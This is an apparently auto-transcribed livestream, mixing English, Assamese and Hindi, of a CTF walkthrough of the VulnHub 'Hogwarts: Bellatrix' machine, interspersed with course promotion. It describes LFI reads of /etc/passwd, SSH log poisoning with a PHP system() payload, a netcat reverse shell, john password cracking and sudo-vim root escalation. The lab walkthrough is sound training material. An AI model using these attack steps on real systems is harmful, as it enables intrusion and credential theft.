Hello to the two viewers who have already arrived. We'll start in a couple of seconds. Let me just check the quality once and make sure that there is audio. Hello everyone. I'll just start in a couple of seconds. And I'm actually running a lot of stuff on my computer, so it's slowing down a bit. Okay, let me start Korea Soitya. Okay. Welcome to live hacking session number 4. And আজি আমি অলপ magic themed কৰিম except মই একো magic নাজানো. And basically the CTF that we are going to solve today is named Hogwarts Bellatrix. And this is the one. Here the description দিছে the evil Bellatrix Lestrange has escaped from the prison of Azkaban, but as dot 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 find out and tell the Minister of Magic. Difficulty seems to be medium. Works better in VirtualBox. Okay, so we already have a mild problem here because I don't have VirtualBox perhaps. Okay, let's do one thing. We'll just download it. Let's just try it once. Okay. So, new. So last time we did a CTF, what happened was I was not prepared at all, and I ended up not being able to solve the last step. And সেইটোৰ কাৰণে চবেই মোক এইবাৰ ক'লে যে তুমি অলপ ভালকৈ প্ৰিপেয়াৰ কৰিবলৈ এইবাৰ দিবা এণ্ড অফক'ৰ্ছ মই অলপো প্ৰিপেয়াৰ কৰি অহা নাই ইনফেক্ট মোৰ CTFটো ডাউনলোড জাষ্ট 10 মিনিটমান আগতে হৈছে সেইটো ডাউনলোডে হোৱা নাছিলে অ'কে চ' আই উইল একচুৱেলি লাৰ্ণ এ লট টুডে আই হোপ এণ্ড অলপ হেৰি পটাৰ থিমড হয় আমাৰ CTFটো এজ ইউ কেন চি আই এম বিয়ণ্ড a Harry Potter nerd, and there is no saving me actually. So I'll do one thing. Let's do one thing. Let's learn how to install VirtualBox as well. Okay, this is a bonus. I'm using VirtualBox install करूँ something that is very important actually. I think I have it downloaded. Maybe it download কৰাই আছে For those of you who don't know what VirtualBox is, it's a way you can run an operating system inside another operating system. It's very easy to use, it's very convenient, and I do not have it downloaded. कोई बात नहीं, we'll download it. VirtualBox 6.1 OS X. Okay. That was insanely fast, 119 MB/s of download. Okay. And you also need to download this thing, okay? The VirtualBox extension pack. You need to download this as well so that everything can run very well. After that, I'll open this. Open the installer.
This is actually a bonus because many of my students keep asking me how to install VirtualBox and stuff. So you will see it finally. So have you seen our new website? It's not complete yet, but it's almost complete. So uh, so this is our website. I'll do one thing, I'll show it to you a bit later. And our extremely talented head of development, Uddipan, he had a huge role in developing this. Most of the ideas were his as well. So এটা install কৰোঁতে আমি বাছ এইটোৱে কৰিব লাগিব যে we will, where did it go? Yeah, we will double click it and we'll click on next repeatedly until it's installed. And it's pretty easy, except my computer has been lagging a bit. So this is how much unprepared I am for today. So you will actually see how first hand you will be able to see যে কেনেকৈ এটা CTF actually solve হয় unprepared হৈ পেলাই কৰাটো, বা even real world problems আমি যেতিয়া solve কৰোঁ কেনেকৈ কৰোঁ, you will be able to understand it this way. Okay, so ই verify কৰি লওক. Okay, so if anyone has any questions to ask or anything else, you can definitely comment. এইটো কি খুলিলে? Installing. Okay, this is the installer. So this is the thing. এতিয়া next কৰি থাকিলে হ'ল, install কৰি পেলাই পাছৱৰ্ডটো খুজিব, পাছৱৰ্ডটো দি দিয়া, install হৈ যাব. It's very simple. Ironically, the Bellatrix VM also turned on, so we'll do one thing. We have already installed it, so it will allow Komai Pelai. We'll just start with this as well. Okay, we'll close this and run it. Okay, so one thing that you have to make sure is your VM network adapter যোনটো আছে system extension কিবা এটা block কৰিছে. So if you are a macOS user, you are definitely going to, hi Rohit, বৰুৱা কোৰ্সটো বিষয়ে কিবা অলপ ক'ব নেকি, কেনেকৈ কি কৰিব লাগিব? Yes Rohit, do one thing. What you can do is go to this link that I have put in the description, trustnetics.com/training. Definitely you'll get all the information there, and if you just WhatsApp this number, I'll type a number. Okay, I think that's the number. Wait, just let me make sure once. Yes, this is the number, so I have commented the number as well. So you can just text the number and you will get all the information. Okay, so our machine to yate on hoy gol, so VirtualBox installation successful. It was just bond ho korido, and I'll anyway finish installing the VirtualBox as well. So remember when I had installed the downloaded the extension pack, right? So I would click koridia, in okay install korido by ko problem. That is enough for installing VirtualBox. Okay, now as you can see, I have a macOS system, and macOS or bhitorte I am running a Linux.
Okay, this is Ubuntu. Okay, similarly, as you can see, VirtualBox extension pack install kare it is install db is very simple, nije install hoy jabo. Okay, welcome Rohit, thanks for your comment. I agree. So successfully installed. Now all you need to do is click kora add on, and you will get all the info. Okay, so that's all about VirtualBox. Now we'll start with our hacking. So jeta virtual machine ami aso, make sure ki network adapter bridged connection ase, nohole it will not work. Okay, and now we'll come to our Kali Linux. Okay, so this is our this is the machine that I'll use to hack this machine. Okay, now I'm pretty sure most of you have read or watched Harry Potter in some way or the other, and just comment kora who is your favorite character and who is your least favorite character. As you can see, this person is the one of the least favorite characters of the entire series for me. And also tell me what you like about it. You could actually get a good connection out of it. Okay, so as you can see, I have a hill. Hi Ravi, how are you? Tell us about your favorite Harry Potter stuff. As you can see, I have a hill of Harry Potter books, and I actually probably have some more, but I can't find on my bookshelf here. Okay, so we'll start with the very first command which we almost always use, that is ifconfig, and I'll check my own IP address once, which is 192.168.29 and 190. Okay, so now I have to find the device, the IP address of this, and what I'll do is scan local. This is a lot of devices. I'll just make this full screen. Okay, I'll just do it one more. Okay, so guys, I also want, if you know how to do the next step, do comment it. Okay, so VMware asset, I think this is the one that we need. Okay, I'm pretty sure that this is the one, because VMware te dutai choli ase, eta hol this Kali Linux wala machine, and the other one is this machine. So I am okay, so I'll take just one comment quickly. Kalyan Dasar course to cyber nisna online koribo lage ne physically goi sob hiki buji korim. Yeah, course to amar actually 30 days of course hai, jonto ami pura office ot koro. In fact, I'll just quickly show you something about our course. So this is the classroom. Ettut ami class koro, and I wonder if we have more images of our classroom here. So we do. So this is the classroom. আমি এনেকে class কৰো, and per batch only 8 students can take admission, যাতে প্ৰত্যেকজন ষ্টুডেণ্টে ট্ৰেইনাৰৰ পৰা একদম ভালকে attention পায়. And yeah, that's about it. So these are some of the topics. We have more than 300 topics and tools that you will get to learn, and you will actually be able to pursue cybersecurity professionally. This course is completely unique in the Northeast. Even India maybe kekhonman institute has fees definitely India ভিতৰতে amare lowest হয়, and quality hisabot, quality proportionate amar definitely we have a very affordable fees as well. So you will actually be able to pursue cybersecurity professionally, not just all of hacking hikilo, all of use korilo, not just like that. You will actually be able to do proper stuff. Jeneke ami eneko etu CTF solve kora is one of the most important things in cybersecurity, and you will be able to do these kind of things very easily. Okay, that's the point of our course. Okay, so ami eta machine hack kori asu just for those who have just joined.
vulnhub.com আমি এইটো মেচিন ডাউনলোড কৰিছোঁ VULNHUB অ'কে vulnhub.com একচুৱেলি এটা কাম কৰোঁ মই কপি কৰি কমেণ্ট কৰি দিছোঁ একেলগে হয় এণ্ড ইয়াতে এইটো ডাউনলোড কৰি পেলাই ইউ কেন ৰান ইট অন ভাৰ্চুৱেল বক্স অৰ VMware মই ভাৰ্চুৱেল হেৰিত কৰি আছোঁ অ'কে চ' আমাৰ ট্ৰেইনিংটো গুৱাহাটীত হয় 6 মাইলত 30 days ট্ৰেইনিং হয় পাৰ ডে 2.5 hours ক্লাছ হয় তাৰপিছত ইণ্টাৰ্ণশ্বিপ দিয়া হয় ইণ্টাৰ্ণশ্বিপত যোনে চবতকৈ ভাল কৰে উই একচুৱেলি টেক দেম to be part of our company okay so I'll do this thing এইটো এতিয়া মই নেটৱৰ্ক স্কেনিং কৰিম ঠিক আছে কি কৰিম নেটৱৰ্ক স্কেন কৰিম okay and নেটৱৰ্ক স্কেনিং কৰিবৰ কাৰণে আমি এতিয়া nmap ইউজ কৰিম nmap minus ss minus sc minus sv 192.168.29. Which one was it? It was the 154, right? So 154 korim and etu scan korar pisot we will actually realize je hetu machine hoy na noy. Even to be honest I am not quite sure. Yes, this is the machine. I'll tell you why, because you can see here Avada Kedavra is being used, so obviously this is the machine. আমি এতিয়া এটাই কাম কৰিম আমি জাষ্ট nmap স্কেন হন এবাৰ আমি স্কেন কৰিম আমাৰ চকুৰে অ'কে such a bad joke so ইয়াতে চোৱা দুটা পৰ্ট খোলা আছে আমি মেক এড্ৰেছটো পাই গৈছোঁ লিনাক্স OS হয় বুলি বাৰু আমি এনেও গম পাইছিলোঁ বাট এতিয়া আমি লাইক উই ডেফিনেটলি ন' ইট 22 port 22 all of my students know this is the SSH port and port 80 this is actually pretty common knowledge eto HTTP port ami website jikono website jete ami kholo he website to khoday port 80 run hoy thik ase so ami just eta kaam koru prothomote will open a browser we'll open the browser and we will type 192.168.1.150 was it 154 154 hopefully it will work oh yes it's not 1 right it's 29 okay it's 29 oi bapre her name is I think Helena Bonham Carter who plays Bellatrix Lestrange in Harry Potter series okay so it's pretty like I kill Sirius Black kebabar likha ase you can see here let me just zoom it okay কিন্তু একদম ষ্টাৰ্টিঙতে মই এটা বস্তু দেখা পাই গৈছোঁ যে লাষ্ট লাইনটো অলপ বেছি দীঘল হয় এণ্ড লাষ্ট লাইনটো বেছি দীঘল হয় কাৰণ ইয়াতে লাষ্টত .php এটা দিয়া আছে চ' এটা কাম কৰোঁ এইটো অলপ ৱেব বেছড হয় যেন লাগিছে চ' এটা দ্য ভেৰি ফাৰ্ষ্ট থিং দেট আই ৱান্ট টু ডু ইজ মই ৰাইট ক্লিক কৰি পেলাই ভিউ পেজ চ'ৰ্চ কৰিব বিচাৰিছোঁ ঠিক আছে again মই এইটো আগতে সলভ কৰা নাই so I might be making a lot of mistakes but at least you will get to see ki real life what cyber security problems keneke solve hoy right okay মই লগে I noticed some things first is this one and this one দুটা comment দিয়া আছে এইটো এটা comment না this time there are no clues in the source code oh yeah maybe I already told you a directory.php so etu hindia boli koise okay and eta code comment kora ase and this is a php code and if you are using this kind of php code you have to stop because definitely you have learned php the wrong way you are not supposed to include a file because etu pora kisuman vulnerabilities ulaba pare ami ite gom pabo paro let's just find out যে এইটো vulnerability এটোৰ পৰা আমি vulnerability কিবা উলাই পেলাই আমি কিবা হ্যাক কৰিব পাৰো নেকি ঠিক আছে প্ৰথমতে এইটো জাস্ট কপি কৰি পেলাই let us just go to this page /v okay it opened the same page ঠিক আছে and okay
So ইয়াতে include dollar file আছে ন get file okay yeah okay এইটো মই মনে কৰা নাছিলোঁ so you already know some things about cyber security or maybe web development maybe and you might already be knowing about this website known as W3 schools right so get versus post method এইটো এটা আছে so get method কি হয় post method কি হয় সেইটো you might want to know and get method to ইয়াতে দিয়া আছে just in case you don't know so this is the website w3schools.com তাতে http method চালে হল okay and yeah so ইয়াতে মই কোডটো আকৌ এবাৰ চাম ইয়াতে get মেথডত ফাইল এটা লৈ আছে okay ফাইল বুলি এটা get মেথডত লৈ আছে তাৰ মানে get মেথডৰ কাৰণে আমি সদায় এটা এটা কোৱেশ্চন মাৰ্ক দি পেলে ফাইল ইকুৱেল টু এনেকৈ দি পেলাই ইয়াতে কিবা এটা এণ্ট্ৰি কৰিব লাগিব সো এইটো কৰাৰ লগে লগে আমাৰ এটা vulnerability এটা ওলাই which is known as file inclusion vulnerability okay LFI local file inclusion even remote file হ'ব পাৰে but I don't think আমাক remote file লাগা হ'ব ইয়াত লাগা হৈ যাব পাৰে আমি ক'ব নোৱাৰো এটাতে but let's just find out so যদি মই এতিয়াতে /etc/password বুলি দিও see yate they are showing us a lot of data okay they are actually showing us wow a lot of data that I did not even like expect okay and let me just see if we have commented something okay so if I have any question immediately commented I'll definitely revise it once okay so yate this is the file okay so if in any website you can find this bug you can find the /etc/password file like we did just now like we hacked this website in less than 5 minutes that too much show kori hack kori so if you can show this you can actually get thousands of dollars in reward from that website that you hacked okay we actually both easily enake earn koribo para eto LFI boli koi local file inclusion okay I mean just file equal to /etc/password boli likhiso PASSWD okay so eta there was this SSL vulnerability SSL poisoning sorry SSL nahoy SSH log poisoning ঠিক আছে so সেই তাৰে data আমি maybe অলপ উলাব পাৰো okay so eta bar am hindi asile hetu karone ami eta gom bhalo baru thik ase we got lucky so eta je ami /var/log/auth.log I think this was the file so etu jodi dio see we have got another file now আমি দুটা ফাইল খুলি দিলো already and like so we khudise why etc/password we just check koribo karone it's very common to check /etc/password PASSWD is very common to check it and we did get jami vulnerability ase so see this is so eta your significance to moi ko a file to /var/log/auth.log to ba /etc/password to ebilak a machine to ase it's in our victim machine ami victim machine or ভিতৰত থাকা ফাইল এটা আমি ইয়াতে দেখাই দিছো so there is a huge significance here ta mane ami eta bostu gom paiso je amar browser die ami he machine to already ভিতৰত কি ফাইল আছে আমি চাই আছো okay so akko yate heri korido agote jontu asile hetu ani dio okay auth.log ঠিক আছে auth.log ত কি হয় আমি অলপ আগতে জাস্ট এইমাত্ৰ আমি ইয়াতে দেখিছিলো SSH খোলা আছে ঠিক আছে কি হৈ আছে SSH খোলা আছে and SSH ত আমি কানেক্ট কৰিব পাৰো okay SSH ত আমি যে কানেক্ট কৰিব পাৰো যেতিয়া আমি SSH ত কানেক্ট কৰো লগে লগে এই ফাইলটোত এটা নতুন
এণ্ট্ৰি এটা আহি যায় যে লগ ইন হৈছিলে নে নাই হোৱা, সেই ইনফৰমেশ্যনটো ইয়াতে দেখাই দিয়ে, ঠিক আছে। Now what we're going to do is আমি just এটা command এটা execute কৰিম, okay? So if you are one of my like students যোনে আমাৰ আগতে full class কৰি গৈ আছে, you actually completely understand all of this and you will be benefiting greatly having done the training. So if you are practicing this alongside me, it would be very good actually. Okay, so এতিয়া আমি এটা কাম কৰিম, আমি SSH কানেক্ট কৰিম। চ' SSH কানেক্ট কৰা কমাণ্ড বহুত চিম্পল হয়, আমি চবেই জানো। আমি দিম ইউজাৰ নেম @IP এড্ৰেছ, বাছ তাতে এড্ৰেছত পাছৱৰ্ডটো দিব লাগে। চ' 192.168.29.154। চ' ইয়াতে ইউজাৰ নেম মানে মই কৈ আছোঁ আৰু ইয়াতে বেলেগ বেলেগ হ'ব পাৰে। চ' যোনটো ছিষ্টেমটো ইউজাৰ নেম যোনটো হয় আমি সেইটো দিব লাগিব, ঠিক আছে। তাৰে জেগাত আমি ইয়াতে এটা মেলিচিয়াছ কোড এটা এক্সিকিউট কৰি দিম, ঠিক আছে। আমি কি কৰিম, আমি উই উইল এক্সিকিউট এ মেলিচিয়াছ কোড, এণ্ড মেলিচিয়াছ কোডটো হ'ল PHP চিষ্টেম ফাংচন। চিষ্টেমৰ ভিতৰত আমি $_get ইউজ কৰিম, ঠিক আছে। গেটৰ ভিতৰত আমি এটা ভেৰিয়েবল ভৰাই দিম যে চি বুলি, ঠিক আছে। দিছ ইজ আই থিংক দিছ ইজ কাৰেক্ট। চ' এতিয়া কি হ'ব, ছিষ্টেমত এটা গেট ৰিকুৱেষ্ট এটা চলি থাকিব, অ'কে। ইটছ ভেৰি চিম্পল, জাষ্ট গেট ৰিকুৱেষ্ট এটা এতিয়া সেই ছিষ্টেমটোত আমাৰ ভিক্টিম মেচিনত গেট ৰিকুৱেষ্ট এটা চলি থাকিব, এণ্ড আমি গেট ৰিকুৱেষ্টটো পঠিয়ালেই হ'ল। এতিয়া ইটছ ভেৰি চিম্পল। ইফ ইউ আৰ এ ভেৰি বিগিনাৰ, ডোণ্ট গেট ডিছকাৰেজ, এইটো অলপ ডিফিকাল্ট লেভেলৰ হয়। কিছুমান কনচেপ্ট ইজিয়ে হয় কাইণ্ড অফ, বাট অলপ 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 এৰিয়া। চ' অ'কে, চ' এইটো দিলোঁ এণ্টাৰ। I think I have made some sort of mistake. So ইয়াতে PHP ত সদায় হেৰি দিব লাগে, okay. Okay, expected this at C. Okay, let me just see one. Okay, so if you have any questions you can ask me in the comments, okay. PHP system $_get. So I can do one thing, কেতিয়াবা সি অলপ error ধৰে, তেতিয়া আমি এইটো I forgot the name of this thing, but we can put this command not found, get PHP operand expected at C. Okay, okay, so maybe আমি এটা কাম কৰিব পাৰোঁ, আমি ইয়াতেও এটা কোড দি দিওঁ, চিংগল কোড এটা, okay, and enter দিওঁ। okay, হৈ গ'ল। ইয়াতে পাছৱৰ্ড এটা হৈ গৈছে, বাট আমি ইমান দূৰ যাবলৈ দৰকাৰ নাই, পাছৱৰ্ড দিয়া দৰকাৰ নাই। এতিয়া যদি আমি ৰিফ্ৰেছ এটা মাৰি দিওঁ, চি ইয়াতে নতুন এটা আহিছে ন, ইনভেলিড ইউজাৰ। চি দিছ, এইমাত্ৰ চিম্পল, ৰাইট। আমি জাষ্ট ইয়াতে কি কৰিছোঁ, ইয়াতে নতুনকৈ এবাৰ আমি কানেকশ্যন এটাৰ কাৰণে দিছোঁ, এণ্ড ইনভেলিড ইউজাৰ হৈছে, কিন্তু আমাৰ এতিয়া এই কোডটো এক্সিকিউট হৈ যাব। এই কোডটো এক্সিকিউট হোৱা মানে কি হৈ যাব, যোনটো গেট ৰিকুৱেষ্ট থাকে, এই গেট ৰিকুৱেষ্টটো তাৰমানে ইটছ ৱেইটিং টু লিচন ফৰ এট গেট ৰিকুৱেষ্ট। মই বুজাই আছোঁ কি হৈ আছে, ডণ্ট ৱৰি। এতিয়া মানে আমি ইয়াতে এইটো আছে ন, এটা গেট ৰিকুৱেষ্ট আছিলে, লেট মি শ্ব' ইট হিয়াৰ। এটা গেট ৰিকুৱেষ্ট আছিলে, এইটো ফাইল ইকুৱেল টু, কিন্তু এতিয়া আমি আৰু এটা গেট ৰিকুৱেষ্ট এক্সিকিউট কৰি দিছোঁ ছাৰ্ভাৰত। চ' ইয়াতে আমি কি কৰিম, এণ্ড চি, গেট ৰিকুৱেষ্টটো চি আছিলে ন, okay, and C equal to ls, okay. ls মানে list all the files, and minus la মানে list with details, okay. la details and like hidden files খিনি দেখাবৰ কাৰণে, enter মাৰিলোঁ,
and ইয়াতে ভালকে দেখুৱা নাই but let me just see ইয়াতে ধুনীয়াকৈ আহিছে ls আহি গৈছে ইয়াতে can you see this it's very simple right ধুনীয়াকৈ ইয়াতে ls দেখাই দিছে and we can see যে ইয়াতে কিছুমান বহুত এখন গিফখন obviously hey it's the image of Bellatrix এখন গিফখন হয় তাৰমানে definitely and this is some sort of a directory likha ase it is some sort of directory then I kill serious black.php এইখন হয় ঠিক আছে and index.php যোনখন আগৰ পেজখন আছিল index.php ঠিক আছে and এইখিনি okay so আমি বহুতখিনি গম পালো এতিয়া and কি কৰিব পাৰি এতিয়া আমি হেৰি কৰি দিব পাৰো we can make a connection from here okay guys comment if you have anything to say or okay so what we'll do next is just let me think for a second okay ami yate so actually ki hoy ase I'll quickly explain it okay so ami olob agote yate je disilo get c okay yate ki ahibo jana yate ahibo ji bostu ekhini jaga diso equal to pisot c equal to ji diso heto amar yate ahi jabo this will become that value and then yate ami kiba command type korim jane ki cd ho kiba ra command type korim ami and see ei command to type kora loge loge ki hoy jabo yate system php system jonto function hai he function to ami use koribo paru to execute some command directly into the linux system ঠিক আছে সো ইতিয়া মানে পয়েন্ট টু কি হল যে আমি ইয়াতে যোনটো দিম কমান্ড হেতু ইয়াতে এক্সিকিউট হৈ বেলে হৈ যাব এক্সিকিউট আমাৰ ভিকটিম মেচিনত কোড এক্সিকিউট হ'ব আমাৰ ভিকটিম মেচিনত এক্সিকিউট হৈ যাব that is what is going to happen here okay again if I'm explaining it poorly I'm very sorry I did not prepare for this CDF just more purana knowledge or for so like so okay don't worry but you will if you rewatch this you'll definitely understand hey so এতিয়া এটা কাম কৰিম ইয়াতে আমি netcat I think ncat আমি এক্সিকিউট কৰিব পাৰিম সো এটা আমি ইয়াতে কাম কৰিম netcat okay netcat jonto hacker swiss knife boli kwa hoy na ami korim nc minus lnvp 1377 let's just 1337 sorry kise koi aso this is the hacker's number okay and etu listener eta yate amar khuli gole to ip address ঠিক আছে and আমি etu ip address eta connect hobo lage so if you remember our IP address to olob agote saisilu ma pahori golo actually so let's just check it once more our IP address is 190 ঠিক আছে 190 is my IP address so yate ki korim moi etia yate ami dim ncat ba nc dileo hobo is the same thing but my ncat this is just in case minus e execute kori ami /bin/bash okay it's a very easy thing but ami yate enter my redeem and okay I thought amar eta connection hoy jabo boli oh yeah amara bhul korilo no I have to also give the IP address 192 wait a second okay 192.168.29 190 asile neki yeah well let's just hope ki 190 asile okay and yate ki connect hoise na okay nai hua see that is what I was talking about being not prepared okay oh you want it to be zoomed okay let me see how do I zoom that okay I'll do one thing mara text file khuli loiso
array is text edit. Okay, new document. So this is the command that I have given. Oh yeah, one more thing. It view source to the DS or no. Okay, still nahi hua. Okay, koi baat nahi. I'll just quickly copy this and bring it to here so that you can see the command that I have used. This is the one that I have used. Okay, at a percentage 22 space hai. ठीक है sir, this is the space. So this is the command. Okay, so I have made one more mistake here. डाঙरকে দেখোতে মই গম পালো, so thank you Ravi for telling me कि zoom কৰিবৰ কাৰণে, because now I realize এটো ইয়াতে 1337 দিব লাগিব, তেতিয়াহে হেৰিটো হ'ব। Okay, so এতিয়া ইয়াতে কি কৰিম মই স্পেচ দি 1337 দিম and I'll click on enter. Yes, this is a good sign, you know. এইটো যেতিয়া ঘূৰি থাকে, see ইয়াতে আহি গৈছে দেখিছা, ls 3 বাৰ আহি গৈছে। এতিয়া অলপ এন্টাৰ কৰি পে জাগা এৰি ls মাৰিম, ইয়াতে চোৱা ইয়াতে ফাইল কিছুমান আহি গৈছে ন। so ls - la যদি মাৰো এতিয়া আমাৰ ডিটেইলত আহি গৈছে, and we have realized ki this is not a file, this is a folder. so এই দুটা আমি গমে পাও কি হয়, এখন আমি গম পাইছো এই ইমেজ খন হয়, it's this image gif হয় বুলি আমি গম পাইছো। so now we'll go to cd whatever this is, এটো আমি কপি কৰি লো and paste কৰি enter মাৰি দিলো। I will just quickly mi দি দিও www data. so এটা কাম কৰো, spawning a cell কৰি দিও ন। so spawning a cell I have taught you before. a netsack code ইয়াতে ধুনিয়াকে we can use any of the ones. I'll use the first one only because I'm feeling very lazy. Paste করে দিলো, sorry, and will it work? It didn't work. अरे अच्छा चलो कोई बात नहीं। so ইয়াতে so এটা ফাইল আছে sword of, oh ইয়াতে আৰু এটা ফাইল আছে ls - la, তো হেতুৰ কাৰণে বহুত ইউজফুল হয়। okay, so I'll just zoom in a bit more. so ইয়াতে secret.dic সদায় ইউজ হয় অলমোষ্ট ডিকচনাৰী ফাইল এটা দেখাবৰ কাৰণে, and sword of Gryffindor বুলি এটা আছে। so cat বাপৰে এটো কৰিম কপি, এটো কৰিম পেষ্ট। see ইয়াতে এটা hash এটা আছে, there is a hash here. okay, ঠিক আছে, এটো hash to copy কৰি লো, copy কৰি I'll just keep it here for the time being for safe keeping. ঠিক আছে, এটো এটা hash হয়। okay, hash মানে password. so obviously there is a account called Lestrange or whatever, and আমি অলপ আগতে তেনেকে দেখিছিলো। এতিয়া who am I command to use হয় যে কোনটো user right now চলি আছে হেতু গম পাবৰ কাৰণে। so I hope that clears your doubt Ravi. okay, so sword of Gryffindor এটো আছে, এটো খুলি চাও এবাৰ ন। cat command to read the file. okay, as you can see এটা কিবা কিবি আহি গৈছে। okay, it's not long. Vadivas you incredibly will also. okay, very good. Recurve byte. okay, it's really nice. so এটা কাম কৰো, এখিনি just I'm doing a very like noob wala thing, but I'm just going to copy this like this. okay, because again I'm actually feeling very lazy today for some reason. okay, I'll just copy this and I'll open a new terminal
and I'll make a file. So vim hash dot txt. Oh wait, it hash dot txt হে কৰিলো ন আচ্ছা ৰবা vim passwords dot txt এটা কৰো I কৰো ইয়াতে কৰি দিও paste গোটেইখিনি ঠিক আছে we have pasted all of the passwords and আকৌ vim hash dot txt আমি কপি কৰি দিম এতিয়া এইটো ঠিক আছে যোনটো আমাৰ পাসওয়াৰ্ডৰ হ্যাশ যোনটো পাইছিলো ঠিক আছে ls so we just need to decide which command to use for cracking the password okay so we have the password ka hash and we have the passwords as well okay list amar diya ase okay so it is just john use kore john word list equal to passwords.txt and then hash.txt oh sorry okay bada bhul hoye gol na sorry yeah oh okay I think this is the password I hate Harry Potter niki okay so see this is the password okay ami copy korilo and ইয়াতে so lestrange বুলি যোনটো আমাৰ আমি অলপ আগতে যেনেকৈ আমি ls - lm আৰুতে ইয়াতে এইটো ফাইলটো পাইছিলো okay okay এই ফাইলটো যে পাইছিলো তাতে যোনটো হ্যাশ আছিল হেই হ্যাশটোৰ ভ্যালুটো আমাৰ উলালে যে I hate Harry Potter okay not a sentence I thought I would ever say but this is the password basically hey so kahan gaya this is the password okay so now what we need to do is we have to switch user right su dash then lestrange lestrange एको নহলে নেকি আচ্ছা চলো कोई बात नहीं I have understood the problem we have to give this command okay spawning a shell tete অলপ আগতে আমাৰ ডিউটি হোৱা নাছিলে so আমি এটো দিও আৰু এবাৰ দিও আৰে হোৱা কিয় নাই I'll try another one sorry copy and paste oh wait what happened he cut it later on chalo koi baat nahi we'll connect it once more he basic connect hoye golo dorkar kyo okay we are back actually connected hoye golo okay so I'll paste this once more and see the problem ki hoyse etu yate paste korilo /bin/bash this however no keneke disile yate /bin/bash okay and yate finally that is weird এটা কাম কৰো maybe python নাই নেকি হেতু so python 3 দিছো -c import pty.spawn /bin/bash oh एक second okay bash
हो गल. Yes. Okay. So we have this here now. So আমি এতিয়া let's trans কৰিলে পাসওয়ার্ডটো এইটো হয় see, we are now this user. Okay, this was easy, right? This was like very easy. Okay, so now আমি shell by গলো. So who am I যদি দিওঁ, who am I? Let's trans হয়. Okay, I am now this user. Okay, so এবাৰ ls মাৰি চাওঁ. Cat readme.txt এটা আছে. Okay, I think this is the one that they wanted me to okay, I want to escape from the prison of Azkaban. Prison spelling ভুল হৈছে, SON হয়. Okay, ha. Okay, whatever. Okay, you won't be able to catch me, I guess, Potter. I was and still am the Dark Lord's most loyal servant. Okay, so I'll just quickly see if okay, Ravi has a question. What was the code that used? Okay, so we used that a few times before in our CTFs as well. So we got it from here, spawning SL netsec.ws. ইয়াৰ পৰা আমি এইটো আনিছোঁ. So this is the one. So আমি আজি Python 3 দিছোঁ. আজিকালি Python কমাণ্ডটো এনেকৈ নচলে, Python 3 দিব লগা হৈ যায়. ঠিক আছে, just that is the only reason. Now we have, so আমি shell আনিবৰ কাৰণে, so মই দেখাই আছোঁ অলপ আগতে গোটেইখিনি এনেকৈ আহি আছিলে ন. Okay, all of the data was coming like this. Okay, normally terminal এখন কেনেকুৱা হয়, it is like this, হয়নে? But ইয়াতে অহা নাছিলে সেনেকুৱা এখন. আমি যাতে এনেকুৱা এখন টাৰ্মিনেল পাব পাৰোঁ সেইটো কাৰণে আমি এই কমাণ্ডটো ইউজ কৰিছোঁ. We are spawning a shell. Okay, so this is the shell. ঠিক আছে, এতিয়া আমি হেৰি কৰিব পাৰোঁ ন. I forgot the command to check the hurry. Okay, so what we can do is we can just SU. So let's translate to correlate. So SUTO minus L. Okay, that was very easy when I didn't know this command or the. Okay, see this thing. ইয়াতে এইটো ইউজাৰে root use হৈ আছে. Okay, from this user. So I think there was a vulnerability vmore, and I'll just search once. Okay, vim sudo shell. Okay, কোনবা এটা কমান্ড লিখিছে, command sorry, article লিখিছে. Let us just find. Okay, wow, this is a very long article. I'm so bored. Double D off. Okay, this is a good idea. So the one that I kind of remember is typing this vim, because I mean now we know that the tool which is known as vim. Okay, all about is unto my type koribo karone use kori asilo. Okay, so sudo vim minus c. Okay, I mean basically we are making a variation of this command here. Okay, not this actually, this is the command that we are making a variation of here. Okay, so shebang বুলি কয় এটো.
Okay, now we'll click on enter. Yes, see, hash. Okay, আমি যদি whoami type কৰো root আহিছে. Okay, and then also if we type id 0 root, congratulations, we have completed the CTF. This was actually surprisingly easy and extremely boring CTF. Okay, I found it very boring, even like the concepts. I really didn't like the CTF, to be honest. It was not thematic at all. Even comparatively, the Avengers one that we did the last time we were online, that one was pretty good, to be honest. But thematically, hacking wise, it was average. Thematically, it was very good. This one to just yate Bellatrix Lestrange photo on chipkai to design theme this. So I think there is some file here, cat readme.txt. Okay, cd/ls cd root cat sorry, ভুল কৰিলো, cat ls control. Oh damn it, sorry, I have to connect to it once more. Oh, do I have to do the entire thing again? Chalo, koi baat nahi, we'll do it once more. Okay, then আমি vim কোনটো ইউজ কৰিছিলো, this is the command that we used. Copy. Okay, paste. Okay, এটা কাম নকৰিব. We'll have to do this thing first, no? This thing. Okay, paste, enter, and finally আমি আকৌ এতিয়া এইটো এবাৰ কৰি দিম. See, it actually was way too easy. It wasn't challenging at all. মই CTF টো এবাৰ solve কৰি চাব লাগিছিলে আচলতে. Oh yes, so Lestrange and this was the password. Finally ইয়াৰ পৰা আমি will put this command and enter, and second time in 5 minutes ami root lolo. Yeah Ravi, there was really no fun. Okay, don't worry Ravi, first starting or 10 minute ami just VMware install kari asilo. Okay, we were just doing that. Okay, so root palo, so cd/root jao ls maro. Okay, see, there is a thing, root.txt, cat.txt. So this is the end of the CTF. Yate Bellatrix Lestrange dhuniyake likha hi goise, and we have the root flag. So this is the flag. So we have again won this CTF. So congratulations. I was getting scared for no reason last week. I mean CTF to jika nasilo. Last week mane, the last time we did CTF. Okay, so I guess this was it. If you have any question about anything at all, just ask now. I'll wait for a couple of minutes. And what kind of CTF would you like to solve next? I'd really like to know. Do you want to do more thematic CTFs like this, or more CTFs mainly for solving the problem? Usually thematic CTFs end up being a bit more interesting, but apart from that there is nothing much. You want to do the Avengers once more? Okay, we can do the Avengers once more as an extra thing. We can do that. So maybe we will definitely try solving one CTF a week at least. So a week or quota আমি complete কৰিলো,
নেক্সট উইক আকৌ এবাৰ আমি হেৰি কৰিম, জইন কৰিম। Okay, so if you want to join our training, all you need to do is there is a form here somewhere. This one, this is the form, and follow us on Facebook and Instagram. And we have a lot of discounts going on as a Bihu offer this month. Let's just see, no, ki koribo pari. Okay, so thank you so much everyone. Can we do now? It's so late, bro. I want to sleep actually. We'll do it sometime. Okay, we'll definitely do it. Okay, Ravi. Chalo. Thank you everyone. Thank you so much. We will meet you next week. Okay. Chalo. Bye bye.